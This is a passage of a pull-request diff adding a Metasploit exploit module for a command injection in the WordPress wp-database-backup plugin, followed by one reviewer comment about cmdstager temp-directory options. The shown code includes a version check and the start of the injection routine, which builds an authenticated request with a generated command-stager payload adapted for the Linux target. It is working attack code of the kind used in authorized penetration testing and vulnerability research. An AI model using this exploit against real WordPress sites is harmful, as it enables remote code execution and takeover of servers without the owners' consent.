modules/exploits/multi/http/wp_db_backup_rce.rb

```diff
@@ -0,0 +1,238 @@
+        `wp-database-backup` page. The names of the excluded tables are included in
+        the `mysqldump` command unsanitized. Arbitrary commands injected through the
+        `wp_db_exclude_table` parameter are executed each time the functionality
+        for creating a new database backup are run.
+
+        Authentication is required to successfully exploit this vulnerability.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
+        'Shelby Pace'                  # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ]
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' =>  'printf'
+            }
+          ]
+        ],
+      'DisclosureDate' => '2019-04-24',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
+      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
+      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  changelog_uri
+    )
+
+    if res && res.code == 200
+      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
+      return CheckCode::Detected unless version && version.length > 1
+
+      print_status("Version of wp-database-backup detected: #{version[1]}")
+      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
+    end
+    CheckCode::Safe
+  end
+
+  def create_exclude_table(cookie)
+    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
+    )
+
+    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
+    print_good('Reached the wp-database-backup settings page')
+    if datastore['TARGET'] == 1
+      comm_payload = generate_cmdstager.first.gsub(';', '&&')
+      comm_payload = comm_payload.gsub('/tmp/', './')
```

Comment:
Are you able to use `:temp` in an options hash to `generate_cmdstager`?

https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/printf.rb#L22-L25